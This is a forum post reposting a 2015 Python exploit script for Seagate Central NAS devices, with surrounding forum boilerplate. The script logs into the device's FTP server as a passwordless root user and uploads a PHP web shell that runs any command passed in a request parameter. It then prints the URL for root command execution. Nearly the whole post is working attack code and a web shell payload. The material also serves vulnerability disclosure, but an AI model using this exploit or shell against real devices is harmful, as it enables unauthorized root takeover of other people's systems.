Jump to content

Recommended Posts

Posted


#!/usr/bin/python
# seagate_ftp_remote_root.py
#
# Seagate Central Remote Root Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# May 2015
#
# -Synopsis-
#
# Seagate Central by default has a passwordless root account (and no option to change it).
# One way to exploit this is to log into it's ftp server and upload a php shell to the webroot.
# From there, we can execute commands with root privileges as lighttpd is also running as root.
#
# -Fixes-
#
# Seagate scheduled it's updates to go live on April 28th, 2015.
#
# Tested Firmware Version: 2014.0410.0026-F
#

import sys
from ftplib import FTP

port = 21

php_shell = """
<?php
if(isset($_REQUEST['cmd']))
{
$cmd = ($_REQUEST["cmd"]);
echo "<pre>$cmd</pre>";
system($cmd);
}
?>
"""

php_shell_filename = "shell.php"
seagate_central_webroot = "/cirrus/"

def main():
if(len(sys.argv) < 2):
print("Usage: %s <host>" % sys.argv[0])
return

host = sys.argv[1]

try:
with open(php_shell_filename, 'w') as file:
file.write(php_shell)

except Exception as error:
print("Error: %s" % error);
return

try:
ftp = FTP(host)
ftp.login("root")
ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb'))
ftp.close()

except Exception as error:
print("Error: %s" % error);
return

print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename))

return

if __name__ == "__main__":
main()

Sursa > https://dl.packetstormsecurity.net/1506-exploits/seagate_ftp_remote_root.py.txt

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...